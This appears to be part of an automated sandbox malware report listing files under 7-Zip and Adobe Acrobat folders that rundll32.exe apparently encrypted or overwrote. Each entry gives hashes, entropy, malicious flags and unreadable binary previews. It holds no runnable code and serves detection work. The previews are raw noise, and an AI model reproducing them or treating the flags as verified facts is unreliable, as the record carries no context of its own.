                                              SHA-256:5CC21FD9980D6C6AA931D5B60B59AAB6DFCEBF4133317FE067029C0CD6EBB56D
                                              SHA-512:18842CED3F363E253B77AC9CE4D765306BB4484573E5766FCDA49A0C00FF4807FCA1C671F2F1F9DED63539435000445D13D33730496B6C34FC7E2E88D5DDC226
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........X.../....S}s..l..}..j.B..j.Z.+...<X.$..X(w..`x.s3.....*.......>.5..F.....8..Q.~T...W..Q........Y[.4...D'K...5...aF.n.o....CrW.L.e.....5.R.]f^.c,.G...I.....4a..n*.5`.O.i...GX...B4.`o{..]...."z..I..tN.....y..?SQQ.F..........$...B...5._.Y !..uqtG.^*J.Xth...5..PPz.X;i...X}.c.......o.r.-..S.Y......@...&.$...o...W.MY.v?....{:.8....|.6..q....|..P....!a.N%$y,Oi..1..}u.}]..P.....<....Pj.9.......l...Ge...;I..~.}.....R@J.7...P.n..G.6.j..~_......`..Q..S..R...x .(v..u..('.n..s.....w.V..l.....i.n.......,F...G.x..1.E..........$.X-.7'..Uh6S~.....w.}t..@.l.:...b...i'..hb.....(.l.|{9J..&5wB.`y...Pq...k.3r.....w..F....Jw..s|.`..ae-.....~y......q....R....".p.CqomC.C...'3.k.=.md.oWaC..5.3....zf.>.A.5.pg..q.".X...@.7.tc.....O....Z...oE..ht%&.)+:...JI^...HY......#.Zq74L...R.Y|.].3m.>.(=.Mn.b....^f...g.j.Zs>9\..)h....`.(....|..B....w.|.AX.....z...($.L.r.m..4..7.....N."."....O....x..M...q.........W....Qz...&$.i..>.Z

                                              C:\Program Files\7-Zip\7zG.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):700432
                                              Entropy (8bit):7.999761209448352
                                              Encrypted:true
                                              SSDEEP:12288:zOHB/lm653tbWUVw0JR3WjFcwrDu+rY2sTODVxGKH4GCbZ:KBFtaUz3u7mXcUGvCb
                                              MD5:F2E86EE10014ECFA3DCB1B86ECCF9CE5
                                              SHA1:26EC8F9585E13B38D42C8A26ACCD5784F540D7E9
                                              SHA-256:E4F3934B66B0C2574A401263E2289DDE6C140960170A5711C7C8558D7E5C53B9
                                              SHA-512:45F621BCB6D68DA284877CA084E96C983B66C77104A32897B4630127210541C9FB437784BC0D0B0A3DC352926FBD2B3DBC61A1ACF3F78B20C70B9CF7877F670B
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.................Q........U...}.6.L....v.C....3.;.6m...........8...Q...lE.k`<X.&!dG..].4)..(..s..t,j......+F.=&..+?2E..,..M.O.I.=t...._.....p..K1..(...i}..R......o........=O `2....T.p..-...q...F.KC'x..g.w.Oi.o...$..N.8; z...yY..)e>..#.\D.X*.."_..>.WW...=.J..~..V...Q.O...(.b}..<F..Q5p.6u.'..rZ.....`..@.....f.%..fz..).Q.Q<.D...(..U.......7e.....)>..Q.!.....].....!...+....%....t&.\.d=.r.....)..?.:......x:e.............8@.y..;}C ~.;.\..g...a.c..-....Q\......~.....3....l.~).ReX.w.3g.R....5."&U.....iX...D.......1....1.t.]...].E..ht....&....X......R..XxFP.h.[.s.Q.8..C..~..v"Y9....Y.\]....&....d.Sx....6D.....5C.R...0.C.=3.b.3..C........D=..3.b...r...O.f.BH.1.W.?K...mG.%..E......5.U..l........8...mw..*}.]........7....`N.#..W..H.......[.I.$........3seT..^..\.G.d~;.5.|..;\....P~.-$.a4.)2.3.J....C^.4XDj.37.t>.z..4B..p.m.z.....JVf.....a.2./.)...gK|..#.ty.7..]ie....m....r...E.';.t........1D.k~........+y)..~

                                              C:\Program Files\7-Zip\Uninstall.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):14864
                                              Entropy (8bit):7.988141091529576
                                              Encrypted:false
                                              SSDEEP:384:x6XL63pU8Df43RbsHOpXhx3m0tSnoRYJKz7bYg+D/MYB9dPVkfj4mk:x62ZUfQuxxEoRYJqv+DEYR9kkR
                                              MD5:CECF46450BF88F16DB9A8FC282CC12CA
                                              SHA1:9F44941ADF55E177D7A99731104A394F57730C25
                                              SHA-256:F9472EA22F263584AD41BBC17A171D4C5A252642D3FD9F1D9C33C64FDE766080
                                              SHA-512:7CA48B16887DC0019C74B075AB73963A2D0EA5912CF01368CDCC2232B57C6FB06FBE472AA0262F4E02FB92B4CD9DAE87110F0A22B8A0621790B9AF36D70AD89F
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.................Q........U...}.6.L....v.C....3.;.6m...........8...Q...lE.k`<X.&!d...d..'...k...../q..<_I&...@.u.....1..`..u.n:Xl@Q.6...sl..#.-.....#F....[5[3Ff.{..D .}...!?O...R...d...n....u..H.m.PO&.._..sGS......o.A..e...W.N.....].V.W..%..(.........(..W.!..3'..T.w0..JI'D....,..if.?..g...k.....F.....F....].au4...6].4.]..FE.T..,o.{L.-bz.I.....3.Y+..8.A-.D.F.e*.N.T..IqV@/.....W..M..<.$..@..O"...'......h@.E.Gq#.......$.............Kt>..5K....((e?...65..ve0B..x.z?sEr>.T..8y..E.W.\...Q../.........HLb.4<......P......%....f6..P...c...N/...p..)./.0.O..._$L..0W?CQ.*..Ew>...[..76.ce e.73q..&.e1V.......S...1\E6......v?....@B.=...~ll......-e.......C..Cz".).......d..^.....|d.....wr*..D9'.0..l.....X.W....AY....D../..P....3/=...S7.7F....GxR.....C.T.d..k.;..o..P~h]%9...&..2...].W..u.T&......0.........zfy).,d}1....+....Y.xa.q.M....}..J[.Ain.t..n...O")...{RF g.."...C.....}L..<...P....$h3....+l_u#.io.....A....

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:OpenPGP Public Key
                                              Category:dropped
                                              Size (bytes):186848
                                              Entropy (8bit):7.999194179880558
                                              Encrypted:true
                                              SSDEEP:3072:sJem9ENVDBGOY1ZV0OZtFfkgVrnYHCLXqQ/Q8vc99Y+D70GMuwrMZ+9sdbzM3GlS:CEnDUV1ZVFvlVrnTXV5099jv0VhG+KcN
                                              MD5:485388B1A8203FACA007320B3BC210A3
                                              SHA1:F3D71A368B8AE899D8B6B46529A32A0B8080AE60
                                              SHA-256:659D4D8D74D05008A6927F8DE9E9FA106BF62BA6F25C37A6063BB043FA28751A
                                              SHA-512:4370B54555A614AD4DB67B503086D44C08F2DA62D0C3DD9C0457D4C0D7CD5AE5EFBD1E8F6243AC169FCF9C349B0C0C1E7C35965AB415966DC27543C63B364F06
                                              Malicious:false
                                              Preview:.%.\.>...JN..fP.3...x.o`...g.....3..3...p..w}J\}...jG..,)2.Oz...T.x..g......x._..e.V....j.6D,D.RUl..Roo.....Z^..N|...8".j=.U...l........P.<3..)bEBT^S..)E.h..a.IBTM.rZ.68...4.~. F.........B\....5.^.1...yM.=B,.+Z.........I.>e..z..=. ..EJ6O.}.~..rj..-..:.0.PH..05b...m.#h..l........4*6.#.......y.5..sx.%..e../.Uu..i.C..$.......<P.K.S..x.xP-......Z...}..w..C.[~.,.........|..{g...4..8.px7V.....j...f`.s...:z..?.R.E.R.$.....(....U.....:.K.x..~..wr..x...3...%...T..dk.3.....Z..q...R3....U.....=?VUh.......D..S/.....@J.....x.;...E$V.a..j..#E.}p....h.....R.g..v..'....S.D....Z.t. ^>.X.N.gb.24xJ.M}....{|......<.1p<..O~....S..S......K......c...SR...km.p.8x6....9........9<.'.P...} ...@.].#...E)qx.....Y..>.....l.X$.'_...#..t.~...._L.J...U..=+.\,..Z.Xh..Y.Y.X.ot...SYJ..#a.(.....n..|c....6z..L.V....1zn.</..W.&.m.~......;T......8..._. M.8...0R...q.....EK.&...h*..t@.P.2,-m.P.e.........N2.Mu.Kx29......_g.Z..Cz......Ed...(*..GS.....-!I..HV..}OV3V.....P.S..Ym.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):652768
                                              Entropy (8bit):7.999720442611078
                                              Encrypted:true
                                              SSDEEP:12288:FH1cFxfD8RjGtM/8Qkvx/4ENDQGXjz1+Vdhren0CDdEKD8911tmZIM+5KeFR:FVcFxfIRjG+/8QkplND5z1+VdgvJAqZy
                                              MD5:610BE2BE8CB4BE83F69567C4C46D3860
                                              SHA1:75CEF5C8233251033E34C589FE3E325EDFB62516
                                              SHA-256:C42E5569DABF084564F62251CBEE7B235730E9A6B6176A0312EA602E7A2D31AC
                                              SHA-512:99477E07A402BE2EAFE7248D3771C31A0A3F18B8A56E8744E8A8EC0727FDFE42AC49AC96115AE68C765FC97D6A4FFA7E3439A33C297F89D861793D5BBD7CB87A
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........V.[N.... sg.".Z...........H.B...B..P.kIq..-......5&.[Ywlj..R.c...b.&...K.m..[_"|I.....Yv..R.I.1..,.{.........|..Pf.Q.yx.. ...F.......A!*Y1....6@..".$...[&..5}...Yz_t...J.a{........N..MD.....~....aN5Cre.~.b..]k...5...+..V.......W.......I.....W...:.O2.`:-.{$.GD............H .E...T...h..N...... v...)y.V9sP.Z.....5e...zjY....&........(....%..xc>.B..U.Dm....X.}~..~E...k.T..t.~%.V..4...,...V.q.S.4...e..:_..b....uHdv..w....$.....?...&......b./..Z.e6.:...u..|.......y...x&.....D.*.l..'%.*9:.Nt~K..N).*M.nB;..g....|=FTF.;.s.:Y....\.`.U4........(.g.EI..%..ok/..3...y~)).<\.+.a......l..z.j....b.......M.JJO...*...p..oy..W.{. ..{...y= .|.../[.]c......h..<.J..C)H...c....=.yKs.....w.T.~.%..9...X.V.....-.N.|.../....8.B.6.......R....2....).O..S.r...Z..9.....3..bm.V+....m8j..5...,.....t.^..^.l..U..G#.X.s...T?d...)..`.=.)..D.z....xU..O..#\.$.....!'....c.&..Q5..C.!.;.b^x.....u.9.5..bd.;.T[p.q.!.^........

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):338912
                                              Entropy (8bit):7.999422264042385
                                              Encrypted:true
                                              SSDEEP:6144:ZBhF7zTjNpvu5rdNrD82DdMGkhlhKXO/cctCCnKB4PP3O:ZrF7zTOrgaqbhZULCKB4/O
                                              MD5:E454AFCD079FB7D02084185F7C84E648
                                              SHA1:D67E3FEE5EE2FB17D83B3BBBA643A632FBADC2C2
                                              SHA-256:A99D4784327F8C77E4D9C1DDDBD47CA1077C2B1AD317840A44F098CD8CB2E80D
                                              SHA-512:35EC57B68A893FCE7D0AA7CC4B3A4136C84E0F025DF08655A0FE2EF99288AD61AAA809E1DD626021936E9C778C8E75573A7C0F52C11BBE1457E72F99F3F1EF15
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.......wS.X..4c.>VV...(r..V.lU..;#.GH}....[..!..+.Yb..A.q.....}..|v.U8.. .g.*.9...4..n.>6]...O*./.);&.}.",..L.Ya.l0].w...s....l..75v..~.:...l.&.pM.....y.uN.a.@.Y\A<...)...w0....l.z1.p.j.......gbO}(...=.J.....dh.k....'.a....wo..{v....~..{..S.N..Br>.......l..[.1.M..R..1!..XZ$.;.6M...a..K..5./..]1..5.e<....B.....~.>.,.t.M.-J#I.0g^x..H.D.w....B9.....B-7.m..5".PQ../<B.c6.i..P.l`,'>.m.....Rjd...H$+~.MM-.ih0V:au...f..?.)....:_.7...].*....B.D@.13....%>U?......D.]a..z<-....A....I.d..3i..A..k8..hQ..@`....s{....6....H1....[...+/|......0...a..d.X.`%{..7+....bv.].....y-..Svc.Um...1...].....E.t..d..J....P-....U......u.s...X..[..{...;`.x.Y..EyY.....b...."..c....Q.\=......o..*....v.}#.g..j...R..m.....^..9G..F....?e..."..F59.k*....$.}.V...O..Y...K...T...M.j....X....\.@.-.I@e~%...y%.....y.`8....P...a..?/`.O.7...E..$..:o.T.........h....t.......7..2d.K=....U..I.d...Y.......=.h....G.X.u.R.$..pP.!.)z.;...e.:w>.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):343520
                                              Entropy (8bit):7.999508269705686
                                              Encrypted:true
                                              SSDEEP:6144:sTphCJXhDIrSMo1ljmatFUlg6YxGg6q400FSCL4KRJPuvAaLIDnvV+5oXbR6J:GphyhDQJo1M4Ulgtx1MlUeoAhDnvVbbM
                                              MD5:B9ACD29341FA4F46DC9E69055668723C
                                              SHA1:135D9EA90F1A4DF594A49A77AF09F9E2052FCD77
                                              SHA-256:45EC61921D2D096DB2C5C9313A7DDC8D24A390F5AB93A2947D534B9A3B5D919C
                                              SHA-512:9C912C1296EE12C625F8122960F65E13BF6EC7A12DA2771AB3F57ED467F557AFC2F24A2BFBA641475D7D64067A3B43E59510C9428D8EFC322CE58513939BBA64
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.......wS.X..4c.>VV...(r..V.lU..;#.GH}....[..!..+.Yb..A.q.....}..|v.U8.. .g.*.9...4..nAs.8.....Kj.7n...a.-V.r.4a.0........._..{..P-=..!{.*.y....4.1o.q......)......w.8......g..Q.S|.x.23q..K...(.X.l...bqXV........."....U7......p.../?W.......Xge...._<6jEs.,...Q....fX..m....GP.W.@?.........O.W./..H...]...s....f....D.`=...%O.....3..M.o.zT,r....{...q..N:1l[...Q...@-........(YG....~Y..........p..'!...."..A..o.Y\KDo..~.F.w.3.o.S....y.....C...~1(.M..-.h...JH..].(...,..|...;.xL.Kt...lK...s.K..O.#...*.I...s...P...`p..S.),b...5.....[.|...Pu....D...k..<L....6..u..W<..ho.T......h...Q2z.;Z.;.u8...@i...iR..%]..h5g!( V..E..oE.J.2(....nb.............Z....NQ..EBN.i/.MB..4.D...3V?..;...v'4u....i.[.+...1.b....a:k.....u.Ut...u.5a.....|.6.W..k.Q....sk.eP8z3[.L<o.4[...2..>....5u.>..a.....f.D.#...q.Ib7Hbi..0.C.u.3.I.w,o.7...p;.!.i~....R.....sf.>..LV.4W.M.......Q.$O..^o..rE..,.....r.......G.[...9..g...<<_....D.u..@....h

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):60896
                                              Entropy (8bit):7.997306410239866
                                              Encrypted:true
                                              SSDEEP:1536:Kt/gi6J3BcWNyR43Tp4gvlCwYx9uuiAw1TQIWJ+CPg:wuJ3BcCyR43FPtClx9MAw1FY4
                                              MD5:AC244A4F83288C7999AD0BCC3D79246C
                                              SHA1:4D5B5E17017A9B3A07039040D97CCABFB642EA52
                                              SHA-256:118377E3933560FD9168AD4DD6CB3C76B8DDE1AF088F6C32E2D2DAA46433ACFA
                                              SHA-512:1D874E09D54D0549F3AC90AB5B2867B35FCCCF495D617687173AFA51A6D637753F9BD2A12A9C1B8C92276927B5EBB0331E9110F2EE67CD3154C134C11087E75F
                                              Malicious:true
                                              Preview:[U....8(.....W$.i=!?........~....>....$B.]"2........8z.....1..;.Z...wAB..f..D.......8..-"I..5...7V.....V.....X.k'%o.qM1........Pz^ee..9.I.+..5.;j../.R.....^4..Q&"............*...5Vf...t.V...>.....8...5..u6...F.._.S.......8e&....r..x.......").R..5.[...m...LQD&..n.+.e..Y....(i.41...........y.E...y.tc..~<..jq..>.._[}.p.J,..8.K4Y..]9.....W{...j..N.>._....l=^.)..ATf.. N>q2v.'.[.c...V+.B....F.s..B...v....i.6T.O..r..A..e."......d.#.P....3..ap..?H.......&...7...e.k.............88.`s14jz..d..W.jVe..Mo.b1.Y.r..g..ul..,2..M..:."....g....6.zO>%dsqc......2U^......{."..q.......B.m.p.;..b.........Y.2.....=..p.:U.~<s.GBd.f\.1..L.B...Em.X.....^.1.5..s.!J.o...8..L. .A..}!&F..?z.T-x+!.h..9....`.>....9.c.....<.K.>i.....!..1...!.*.{...'.S$-..f.....HlM..^DF...yE..+...VM.Zk.j...;KF.../.;...1..8....;..^E....6........T%.B.VP.~..OU.Y.6.*.x.6.v....\...Ay&.~2.4...'.}.%=..~r..@..s...D.HX...l.gmC...e..ja.7o.M3E...$@*mU....^.W.T......s.FV.........-..)..*.O/..Z.G.....oT

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):37856
                                              Entropy (8bit):7.994809943917804
                                              Encrypted:true
                                              SSDEEP:768:vo3wdrxHuHotUUhk21JnsKIdpODkMACibvaTvAx18Y7:vm6rxHuIG7AxsKIdYACirb18Y7
                                              MD5:E4CE6F93E8C81131583F451C784AF30D
                                              SHA1:49E4D6372964BB5AC6D863879307EA561ECB5992
                                              SHA-256:EF1C82134118D60F640ECC91B724C8BD45F6D1924F8C38010402F2A86489B2B1
                                              SHA-512:9B44854D428C7D5FEE8226BF059EF5F653DDC5E38BDE794C4272F4038D56BFCB931E0BE3D04611FFF34BA9D24ADC788A25BAE95D17A7F5EF294F9BF195276273
                                              Malicious:true
                                              Preview:......CJ.=.O.:U..XmzaR.X.....6..(.%.g....qn.}..+....r..g..I.qqG.k......KH..^z-K...9....\I.P...;.8.......`N..h.`..=.."....\...._u...jt.,....9.+._..z....W.....(e.(. .k...'U..$....]Xs+..1/.['Nq.).(.=).aB..1.....-.....w.. ae...O....)o-.b.....z._A(.+.._...L.x.t.a..t..=.!...Y.A.V..X....J.\.b:.......]..|D..AU.)g.eK.y3.F{.m..+w.R...b..0.Px.E..@...s....N........f..h'.(.t..6...'........6G@...=...a..u.#..3...8...#...*.....U')j...w._]/.a..-.c.:.....W...3..B.K.dQ..[..9ltq......Qp.)...p...... ..P..K7. ..F.....l02......c(e.i>.:n.b....!.L........?.s....._.P.t._...R.A......mx.q>.../....=...\F.y..q....c......W.Ar{6.Wn......En...@.{...t...TF......._....9.s..,U8...]=..A..(kk..FD99......-h.... ...N......p....&..B..+....J..y..#..dV.E..\.%...7z .&..S@.9......Q`z.]...Km...s.y......AA..(.c.|Qs"$.\?*.........;..K....N..8...y...1..Z...Z...Q..e...d,W....9+.D.(.~c.[.2.....@?.n.... k..&fDl].T.3......Yx......E#..4..?.F.q.Cl.b&.M&.Z......z........!`F...V......dV{d

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):203232
                                              Entropy (8bit):7.999331661506748
                                              Encrypted:true
                                              SSDEEP:3072:uKMnwkK0RIT7y5hLAE9veXAP3aduy8HA84wcYawP2m91t0bI1tHrhh/N4pEvnKD/:xrklKq5JAL+ANn6uk15/SpEvnKwIZN
                                              MD5:87DD2CC09C4151776172EBD83024A686
                                              SHA1:75D35DC87E2070AF1E09719AB07393E5A3C41009
                                              SHA-256:F1B7629ADACEE5DF886051A0CADC19CCC4457C3437901791A638324E6E96D638
                                              SHA-512:776B5C5946A927B1D4E60AC70C9FADD5C56FDF4701288977B064FDDB6FC578AB1932EE34E0F8E0B63BB9570A69E3FF338029840A259ADDBAA52E842741673EA0
                                              Malicious:true
                                              Preview:.Q.,.S...0..#..0...il.*....p.@.r5.L..`....p.Z.......G.........g...\).%a...=.LZ.6.+q[..%..Qw.Q5.k.QA...(.*`.CO......l.W........F.u.&.Mm."....~.........7-:a...%...Zw.....=..g#g.ze.........Br``...\.?M..o.Tx%M......j.(\{.I......[y.{37......kMRK'<.G.92.b.......x8p.,u.Uk.R...@i1.......o..Qe.............!,..^.(.UV..y6....&..oi.hK$..<.A..C......h.......l...."..{A...0..E.Ae.{.?p......s.....7......"....j.;.Y.C..OG.....P.2.E5..~.{.g..... .....8f.G.~.....Oz.-..}...B.1*..m.X..}.E...m......9.^7.97.g....}^...q..`.......E.w...@..i...n.fv~.. ...]_..ep.|x.E...DQ.S..I...=.L.X.cs.......I...f.P......z.C..S..<Wv.{.n{...........3%.]k.af.r.)4.j.Wed?..'........{:.0.#.o.Wiw ..].D:0..M....k..=<...|!..|.....).'6.....1..m...!...:i..B...'.....m..Ogm.5...U.?q.......n.`...t..........7.;.....=T....t.>....B..K.sj-.L.H..-N..q.6...../..$V.(..X.d .g.H....9.02/.....GFzl..8.QKD?.8DJ5p<.....T%.F07.>..+.\...1....b.".%f[...9.n..T.C.T?.=<...$..!\..0O=..6...2N....9......q...}.d[+..w%...0m.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):770016
                                              Entropy (8bit):7.999761788790326
                                              Encrypted:true
                                              SSDEEP:12288:wOiU9yChSbpt1BIArl0c2AKFZ/eKImgFAjWFoZApJT0kbXiCKPOqtD+jRQLW:biUG1iQl3OJvNgFXFZpJT0SXiCKP1teT
                                              MD5:10A6B71EB12F36C23155A13466103195
                                              SHA1:8E777A9943A5AB614E2C7841BD121415943D4756
                                              SHA-256:B9C00B0E7D82CA7B2B2548599C9A27BAB36784A27E766635B41CEF3B68F059B8
                                              SHA-512:D7C7E2F32FAB6861B395064C1892720E677D2D38B51C2777B01112993089A66A77B5228EF36ED0F32FB32C222140446CE79342D75D8DC65E35200A0BEF093DD9
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$...........B....r.S=..........^b...C.8JH...#....1$..yI2..)h..#.*c....>.c.../.+..A.x..H....7...X2.OSAq.E.....).}....?....V.....3.e...=4.J..y..5_}.F...x.0.....'...!.a....`.'..kz..2..3c..f.H...=.h..3c .7V...7..v..F.w...bH...pP.+P?...lH..f..qm.Ps......qlaW.M..N.7..3v..oYt.S.A~1...|..9.LMt...i.KR/.p.^.!F}.....L.ic....c..vp..e._........0....wp..S\.Z.]&.%..... w..@...@z../..p1G.SD@.(..`X.p.qABo.V|..r..0.\......c.R.....o.sl.D6..qQ(.m....2.0...h....\....K.....O..G0)..{...."}J..>...e..k....j.i~h..h......o.'n.~.N....8.a.'.$(..X.4.P.Of;K'(u.B./...D.V....H.J..7..>....Fv#Vs....1's.3.....Q.y.Vz@.5.a......76.....A*.bo$.FQ.....L..fgQ..)...#w-......L.@e.jJ..X.).E^>N.............@.t....(.......Yc.].6........Q..%.k.Q...|K..i`?.....M[l...l....... x.7....:......k..=.S.G.9.~..$........$......&-..m-DK...1U.Y...V.I.;......0QdY6..e.O'd...{.T.U....dx..........L%(..[..'4..W.xI'...1.G..y......l2Gs. ..V$g...$....]Gg...}..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):396256
                                              Entropy (8bit):7.999546784000972
                                              Encrypted:true
                                              SSDEEP:12288:fgRCz/D78xgqpsQVW+Lz+ZYBvC3OSfl4dH:fgAz/fOD5M4C3OOlwH
                                              MD5:62141E0DA23D43B8EFC5520B6FC86E45
                                              SHA1:B63416E006C9D3ED1D95595848B4B8AB16AFEE39
                                              SHA-256:27BD2EF70BE565C33B97295E083DE1D01E1920EDF6CF417EC373989F97E1AFFB
                                              SHA-512:E915B4DEA916BFFF1D128D1B588C8C294B1B3C7399DB6EDC608066737717C685E0EB4F142B594CA54B3A8B83106E638C516198F152CD91EBF08AC80F961AC6A8
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........V.[N.... sg.".Z...........H.B...B..P.kIq..-......5&.[Ywlj..R.c...b.&...K.m..r.w.....yF..L.D....q. C>dc....O.>..8....A.. XwI...~.D........M..J..5d^...I.....2.5...;[/... .....>........-.{[.]GF.p^.)...^....&Q..7..fQ/g.!..?.=. .2.L.pV..&Ui)..l...n.c 0>2..B{.b..(I<.7..S.sN.<.....^.......tb~..Wm.=..S...JG.`......s..0........:.r..8^...P.Cs$8..u.%..].*%...|.p...l..i_.(.`S...q..A.f.J....XZ./5s....Y..E/|9...B:'6....{..r.S..@..\j....Z.7.....c{-!.A|w.......6... +..S..M\...A..C=`.s{[.[Jz.?I.eH<..x.....O.....Z.Q.U.........-...R....V.1.L.sL..p..8.6N...1..[..Fv..j...]..v../h.v..C.....,...d.3.....@.8.......;P..W..R./.o.....2......Z.3|.M....3.r...HUT!..#....t...7..|..<j.]..A..I.v...RO.;\.......Z...O`...."..n..@Qz.."..r.....c.{..&%....m.BCg..A.].M.a.g.= ........F...7dw.1..N.....d.0O.V .F..+......h...|..3.(.MH..$.]j.._k.....k..%G.*P-E..}..H&/(.,\.#.(.W.=.Y.....Z8.Y.Z.=. .%....4"..b.x..........I*i+...Bg...o.C..@.4.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:OpenPGP Public Key
                                              Category:dropped
                                              Size (bytes):186848
                                              Entropy (8bit):7.999194179880558
                                              Encrypted:true
                                              SSDEEP:3072:sJem9ENVDBGOY1ZV0OZtFfkgVrnYHCLXqQ/Q8vc99Y+D70GMuwrMZ+9sdbzM3GlS:CEnDUV1ZVFvlVrnTXV5099jv0VhG+KcN
                                              MD5:485388B1A8203FACA007320B3BC210A3
                                              SHA1:F3D71A368B8AE899D8B6B46529A32A0B8080AE60
                                              SHA-256:659D4D8D74D05008A6927F8DE9E9FA106BF62BA6F25C37A6063BB043FA28751A
                                              SHA-512:4370B54555A614AD4DB67B503086D44C08F2DA62D0C3DD9C0457D4C0D7CD5AE5EFBD1E8F6243AC169FCF9C349B0C0C1E7C35965AB415966DC27543C63B364F06
                                              Malicious:false
                                              Preview:.%.\.>...JN..fP.3...x.o`...g.....3..3...p..w}J\}...jG..,)2.Oz...T.x..g......x._..e.V....j.6D,D.RUl..Roo.....Z^..N|...8".j=.U...l........P.<3..)bEBT^S..)E.h..a.IBTM.rZ.68...4.~. F.........B\....5.^.1...yM.=B,.+Z.........I.>e..z..=. ..EJ6O.}.~..rj..-..:.0.PH..05b...m.#h..l........4*6.#.......y.5..sx.%..e../.Uu..i.C..$.......<P.K.S..x.xP-......Z...}..w..C.[~.,.........|..{g...4..8.px7V.....j...f`.s...:z..?.R.E.R.$.....(....U.....:.K.x..~..wr..x...3...%...T..dk.3.....Z..q...R3....U.....=?VUh.......D..S/.....@J.....x.;...E$V.a..j..#E.}p....h.....R.g..v..'....S.D....Z.t. ^>.X.N.gb.24xJ.M}....{|......<.1p<..O~....S..S......K......c...SR...km.p.8x6....9........9<.'.P...} ...@.].#...E)qx.....Y..>.....l.X$.'_...#..t.~...._L.J...U..=+.\,..Z.Xh..Y.Y.X.ot...SYJ..#a.(.....n..|c....6z..L.V....1zn.</..W.&.m.~......;T......8..._. M.8...0R...q.....EK.&...h*..t@.P.2,-m.P.e.........N2.Mu.Kx29......_g.Z..Cz......Ed...(*..GS.....-!I..HV..}OV3V.....P.S..Ym.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):15760
                                              Entropy (8bit):7.987846023043197
                                              Encrypted:false
                                              SSDEEP:384:CLMWVhR4fWRwu3wZ0IVPsHbxWyuGeLHR8VD4i7I:CQWVhR4eRn3BAPs7eGeLHR8VDbI
                                              MD5:4F896E909D2A69AFEF14D44DEA781F9A
                                              SHA1:2AD509C7D7165143AFAA991DE1E122711BBABC92
                                              SHA-256:56E92F22B215172CBDC6DCBBA8A95B20760B4427D4D27B7748EE16E72BBCE048
                                              SHA-512:BC1A0481C75CB7F309B8898E82150C2C887EFB9C8ABF0B483490BE9584B0801FB80E772EB4C573054898FC3F07AC016C7012B7D9406DCD77FFF51BE6B9286FF7
                                              Malicious:false
                                              Preview:...F.`.D.....`b..J..".#al...O........[......a..PV..o......d..ZV~...IV..=.D.....G}._VQ.i93...t..@..h.{>bO.P.....#.*...{..0.....L!ol....B.6II....k.....e+.Z......[.A&...Y}Sq..4.$.y.wO..1...}.y.z.qFJ.).1.[*.s.o.r...p.'.....>...IaO..N.w..x.......1`.>....me....6@,.K....M.?........i.D...IqU>.YS.....{,.FW..\#.....91I0.....#..tQ....b.41....}....`[..]..:F.<*$.5.#tc.u....[..Vz/...%Y..Z.7.l..V.....i.tp....;W.&d..X.."....w.......oj......P...n.7.,..T...W.`.^Rc.&.../C...J.>...}n.....U?...6.....&^qg....\.....?wX..2..>"........hv...h....b#....4`.i..%.g.KY-...]^.:.s5....M.i.....q:..,.......oUy.....]B.Ks).......vC.w.1..7.. ..Z'..`.+.00......T.}.R....G.h+..k.....twG...0.W....6..rz+........"..3...p=D..^.J..Ug.^..._c...k4...lehd..`.ea....L6.@..?.WX|.m.r...8X"}..W'..<.Y..\."...Pj..z?Y.;}.......w.<..8...h...k..O...:...vKC.LJ.u1.....{..G.....-..:\*..=...y(e..G..o...~].)+.S.........E.8~..qAy..n.....K.b.............l')..dz[b...../W...}......j.).31.}......-K..Q..;

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf

                                              Download File
